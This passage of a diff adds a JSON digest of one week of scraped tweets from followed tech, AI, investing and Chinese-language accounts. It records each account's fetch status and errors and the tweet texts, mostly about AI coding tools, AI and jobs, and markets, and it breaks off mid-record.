"Berryxia" + }, + { + "handle": "Pluvio9yte", + "name": "雪踏乌云" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "CuiMao", + "name": "CuiMao" + }, + { + "handle": "0xAA_Science", + "name": "0xAA" + }, + { + "handle": "dingyi", + "name": "Ding" + }, + { + "handle": "GoSailGlobal", + "name": "Jason Zhu" + }, + { + "handle": "frxiaobei", + "name": "凡人小北" + }, + { + "handle": "gkxspace", + "name": "余温" + }, + { + "handle": "Stv_Lynn", + "name": "Steven Lynn" + }, + { + "handle": "chuxiaeth", + "name": "初夏" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "wolfyxbt", + "name": "杀破狼" + }, + { + "handle": "runes_leo", + "name": "Leo" + }, + { + "handle": "oranges", + "name": "比特币橙子" + }, + { + "handle": "realNyarime", + "name": "奶昔" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 478 + }, + "period": { + "days": 7, + "start_utc": "2026-04-24T19:37:19.444626+00:00", + "end_utc": "2026-05-01T19:38:36.469180+00:00", + "month_tag": "202605" + }, + "overview": { + "total_accounts": 44, + "active_accounts": 34, + "total_tweets": 478, + "failed_accounts": 3, + "source_hits": { + "nitter": 40 + }, + "source_errors": { + "snscrape": 3, + "nitter": 3, + "rsshub": 3 + }, + "tweets_kept": 16 + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "oranges", + "account": "@oranges", + "name": "比特币橙子", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If you think you are going to get alignment out of LLMs you are sadly mistaken.\n\nIf you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment (or even managing gremlins) you’re probably fucked.\n\nResist the proliferation of LLMs, before it’s too late.", + "url": "https://x.com/GaryMarcus/status/2050296366161940584", + "published_at": "2026-05-01T19:28:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children", + "url": "https://x.com/pmarca/status/2050295934920302777", + "published_at": "2026-05-01T19:26:58+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Media", + "url": "https://x.com/Stv_Lynn/status/2050286033552736527", + "published_at": "2026-05-01T18:47:37+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games \n\n@GovernorShapiro @david_adelman care to be my some of those nasty cheesesteaks for some bagels?! 😂\n\n[ sorry @celtics, you can’t make it out of the first round! ] https://x.com/BattleRapBum/status/2050204814026457495/video/1", + "url": "https://x.com/jason/status/2050284947345486290", + "published_at": "2026-05-01T18:43:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "AI and GDP - what does it mean?\n\nSure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured, even though that activity has no value.”\n\nIn the case of AI, GDP is going up because of *investments* in AI infrastructure, but not because users in general are getting Return on Investment (most haven’t, so far, per multiple studies).\n\nThe future of our nation doesn’t rest on building data centers; it rests on building AI that is *good enough to consistently add value for its customers*. \n\nIf it doesn’t, all the building of data centers will turn out to have been an enormous black hole, temporarily good for GDP but of little lasting value.", + "url": "https://x.com/GaryMarcus/status/2050284439343862266", + "published_at": "2026-05-01T18:41:17+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "哈哈 @OpenAI 官号换掉了banner了\n很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。", + "url": "https://x.com/CuiMao/status/2050281878322811194", + "published_at": "2026-05-01T18:31:06+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "一直想要个越野摩托车,这次张雪出了 MX250,支持一下。", + "url": "https://x.com/0xAA_Science/status/2050281865245024365", + "published_at": "2026-05-01T18:31:03+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Bill, the Knicks have won the east", + "url": "https://x.com/jason/status/2050280406461677908", + "published_at": "2026-05-01T18:25:15+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "One of the things I hate the most about this site is the consistent lack of nuance.\n\nThat’s why everything is an argument, and progress here is so rare.", + "url": "https://x.com/GaryMarcus/status/2050279819347448258", + "published_at": "2026-05-01T18:22:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead.\n\nMaybe “clown” isn’t the right word here.", + "url": "https://x.com/GaryMarcus/status/2050279436717785406", + "published_at": "2026-05-01T18:21:24+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2050276070952517767", + "published_at": "2026-05-01T18:08:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Meta is basically Black Mirror incarnate.", + "url": "https://x.com/GaryMarcus/status/2050275183223857462", + "published_at": "2026-05-01T18:04:30+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, maintainable, well-architected software. The first is verifiable in seconds; the second requires the kind of judgement that has been the historical bottleneck on engineering productivity.\n\n[OpenAI President Greg] Brockman acknowledges the gap, even as he argues it is closing. “The technology we have right now is very jagged,” he said in the Big Technology interview. “It is absolutely superhuman at many tasks. When it comes to writing code, those kinds of things, the AI can just do it. But there’s some very basic tasks that a human can do that our AI still struggles with.”", + "url": "https://x.com/GaryMarcus/status/2050275059361792137", + "published_at": "2026-05-01T18:04:01+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "you know what\n\nall of these \"which is better\" polls are silly\n\nuse codex or claude code, whatever works best for you\n\ni am grateful we live in a time with such amazing tools, and grateful there is a choice", + "url": "https://x.com/sama/status/2050274547061129577", + "published_at": "2026-05-01T18:01:58+00:00", + "source": "nitter", + "title_zh": "多位开发者呼吁理性看待AI工具选择,认为直接使用实证性工具更有效率,行业竞争将推动生态多元化" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used to be around this time last year. It is a sad product story.", + "url": "https://x.com/liuliu/status/2050267276893708414", + "published_at": "2026-05-01T17:33:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Elon Musk, Sam Altman, the future of humanity, and … goblins.\n\nTerrific interview @theinformation with @rocketalignment \n\nhttps://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl", + "url": "https://x.com/GaryMarcus/status/2050266692732014689", + "published_at": "2026-05-01T17:30:46+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Last 10 Years\nNVIDIA $NVDA: +22,875%\nBitcoin $BTC: +17,205%\n$AMD: +10,030%\nTesla $TSLA: +2,362%\nApple $AAPL: +1,233%\nGoogle $GOOGL: +999%\nNetflix $NFLX: +932%\nMicrosoft $MSFT: +844%\nAmazon $AMZN: +717%\nMeta: $META: +425%\nS&P 500 $SPY: +312%\nGold $GLD: +245%\nUS Inflation: +39%", + "url": "https://x.com/charliebilello/status/2050263578188333549", + "published_at": "2026-05-01T17:18:23+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅\n\nAGENTS.md塞不下100万token的领域知识,\nRAG搜不到\"未知的未知\",\n我自己维护Skills维护到想吐。\n\n在公司里,新人入职花两周pair一下就能内化领域知识。\n现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这个gap确实没被好的工具解决。\n\n如果有个工具能让用户持续喂入领域知识,且这些知识真正内化到推理里而不只是RAG式的检索拼接,那比现有方案高一个维度。至少目前还没看到谁把这件事做好了。", + "url": "https://x.com/Pluvio9yte/status/2050262789256859872", + "published_at": "2026-05-01T17:15:15+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯\n\n我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快\n\n以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果:\n\n1. 如果把省下的时间也一起交出去,只写prompt按Accept,那就跟刷老虎机没区别,退化是必然的\n\n2. 但是把省下的时间花在架构设计和code review上,认知负荷会不降反升\n\n简单说,AI干掉的是执行层重复劳动,对设计层的要求反而更高了。产出速度快了,犯架构错误的代价会成倍放大。\n\n这不是\"AI让人变笨\"的问题,是工程实践有没有跟上工具进化的问题。没有测试、没有review、没有架构思考,AI越快翻车越快,脑子也会越来越锈住。", + "url": "https://x.com/Pluvio9yte/status/2050260712858210516", + "published_at": "2026-05-01T17:07:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "#FF @PeterMallouk, a great follow!", + "url": "https://x.com/charliebilello/status/2050259734930800740", + "published_at": "2026-05-01T17:03:07+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料,\n这个逼社会太疯狂了,我已经看不懂了。", + "url": "https://x.com/CuiMao/status/2050246075219693922", + "published_at": "2026-05-01T16:08:50+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候?\n看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!", + "url": "https://x.com/0xAA_Science/status/2050244250563182801", + "published_at": "2026-05-01T16:01:35+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "目前 WTF AI 讨论群已经 700 多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。", + "url": "https://x.com/0xAA_Science/status/2050243640925233619", + "published_at": "2026-05-01T15:59:10+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡", + "url": "https://x.com/CuiMao/status/2050242393132396921", + "published_at": "2026-05-01T15:54:12+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ", + "url": "https://x.com/jason/status/2050240926707314767", + "published_at": "2026-05-01T15:48:23+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Apple Support App发布打包进了Claude.md 文件\n\n看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈", + "url": "https://x.com/lxfater/status/2050240636020732015", + "published_at": "2026-05-01T15:47:13+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 提示词:\nRework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slightly imperfect, like a child’s drawing. Avoid using the original color palette—replace it with bright, playful crayon colors on a clean white paper background. Aim for a soft, cute, and innocent aesthetic. Incorporate fun, childlike details such as castles or towers, candy, stars, clouds, and other whimsical decorations to amplify the playful vibe. The final result should feel charming, colorful, and full of childlike imagination.", + "url": "https://x.com/GoSailGlobal/status/2050239662288146865", + "published_at": "2026-05-01T15:43:21+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "海外疯玩的prompt \n\n可以用来给自己的profile,生成一个十岁小孩的蜡笔画\n\n提示词放下面👇(截图+pormpt就行):", + "url": "https://x.com/GoSailGlobal/status/2050239659377295552", + "published_at": "2026-05-01T15:43:21+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "不要和别人竞争。让他们变得无关紧要。\n\n你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。\n\n在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。", + "url": "https://x.com/svwang1/status/2050236650329186525", + "published_at": "2026-05-01T15:31:23+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️\n\n这是 AI 做整套游戏角色目前唯一能跑通的工作流\n\n99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 \n\n无论怎么 prompt(给 AI 的文字指令)、怎么传参考图,图像模型就是做不出对的走路循环 左右腿对不上、人物飘出画框、scaling(缩放比例)会乱\n\n🌟 视频模型在这一步反而无敌 \n\nSeedance 2.0 image-to-video(字节跳动的视频生成模型,输入一张静态图,输出一段动态视频) 4 秒长度,吐出 80-120 帧(一帧 = 一张画面) \n\n关键 prompt:让角色「原地跑」,不能跑出画框 绝对不要传任何画布或网格(图像模型那一套在这里全失效,视频模型会把网格融进画面) 然后从这 100 多帧里挑 8-12 帧拼成 sprite sheet(精灵图:把所有动画帧拼在一张图里的格式,游戏引擎按帧切片使用)\n\n🧵 完整工作流 ↓\n1️⃣ 先做 anchor(锚定图:后续所有素材都基于这一张衍生的基准图) 必须南向,必须中性姿势(不要让它拿武器或法球,否则走路动画里它会一直跟着你) \n\n让 GPT Image 2.0 出真像素风有个偏方:除了 prompt,再传一张黑白格子图当第二参考,强制它按格子纪律出图\n\n2️⃣ 从 anchor 扩 4 方向(南 / 北 / 东 / 西,2D 游戏里角色面朝的四个方向) 南向 → 让模型生成西向 → 再生成北向 东向直接把西向水平翻转,省一次生成的钱 \n\n翻转时背包 / 武器位置可能错乱,prompt 里加一句「不要让效果出现在背后」\n\n3️⃣ idle 和 attack 用图像模型 + 网格画布 \n\n传 anchor + 一张 1280×512 的 5×2 像素网格画布 按 frame sequence(帧序列:一个完整动作里的连续画面顺序)出动画 \n\n出来后再让 AI 重新提取每一帧居中(模型自己排版的间距经常是错的)\n\n4️⃣ walk cycle 用视频模型(上面那一段)\n\n5️⃣ 背景统一用 chroma(色键:统一颜色的背景,方便后期一键抠掉)紫色 GPT Image 2.0 和 Nano Banana 2 都不支持透明背景 \n\n所以全程用亮紫色,后期 http://remove.bg(一个在线去背景工具)或 fal(http://fal.ai:一个聚合各家 AI 模型 API 的平台,相当于 AI 模型的 1688)上的 birefnet(开源的智能抠图模型)一键去背\n\n6️⃣ sprite normalization(精灵图规范化:把所有帧统一对齐和裁剪的清洗步骤) \n\n所有帧统一裁剪、脚底对齐、高度校正、锚点、补边 \n\n不对齐脚底的后果:角色会在游戏里跳来跳去\n\n📕 整套跑完,一个不会画画的人,能做出 4 方向 × 4 动作的完整 RPG(Role Playing Game:角色扮演游戏)角色\n\n现在不会画画的人,也能 1:1 还原他脑子里那个游戏", + "url": "https://x.com/GoSailGlobal/status/2050236307721584945", + "published_at": "2026-05-01T15:30:01+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are Tony Xu and Brian Chesky and the Collisons. Respect? More like awe, frankly.", + "url": "https://x.com/paulg/status/2050234809188761677", + "published_at": "2026-05-01T15:24:04+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。", + "url": "https://x.com/svwang1/status/2050234282208317919", + "published_at": "2026-05-01T15:21:59+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "url": "https://x.com/sama/status/2050233324963008553", + "published_at": "2026-05-01T15:18:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "url": "https://x.com/paulg/status/2050233324963008553", + "published_at": "2026-05-01T15:18:10+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb", + "url": "https://x.com/jason/status/2050230480751243284", + "published_at": "2026-05-01T15:06:52+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "终于。\n\nClaude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。\n\n实打实有体感的两条:\n• /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 session 也常驻 55M+,这次提速能直接吃到\n• MCP servers 改成并发连接,启动不再卡最慢那个——装了 serena / playwright / memory-mcp / opinion-trade 一堆之后,开新 session 体感差是常态\n\n加上 mid-task 蹦出来的 Please run /login 也修了,跑长任务的人这次值得 claude update 一下 👀", + "url": "https://x.com/runes_leo/status/2050229609795407876", + "published_at": "2026-05-01T15:03:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Google is a mega-buy on the back of the Anthropic investment \n\n\"Google becomes a win on multiple fronts.\n\nThey benefit whether usage goes to Gemini or Anthropic.\n\nThey have unmatched compute capacity and cash flow, letting them allocate resources across their own models and partners.\n\nThat flexibility means they win regardless of which model succeeds.\" @jasonlk", + "url": "https://x.com/HarryStebbings/status/2050229254705553516", + "published_at": "2026-05-01T15:02:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amazing life of prosperity.", + "url": "https://x.com/sama/status/2050229060887044494", + "published_at": "2026-05-01T15:01:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong.\n\nthough of course there will be disruption/significant transition as we switch to new jobs, the jobs of the future may look v different, etc.", + "url": "https://x.com/sama/status/2050229059507159242", + "published_at": "2026-05-01T15:01:13+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we want to build tools to augment and elevate people, not entities to replace them.", + "url": "https://x.com/sama/status/2050229058425045178", + "published_at": 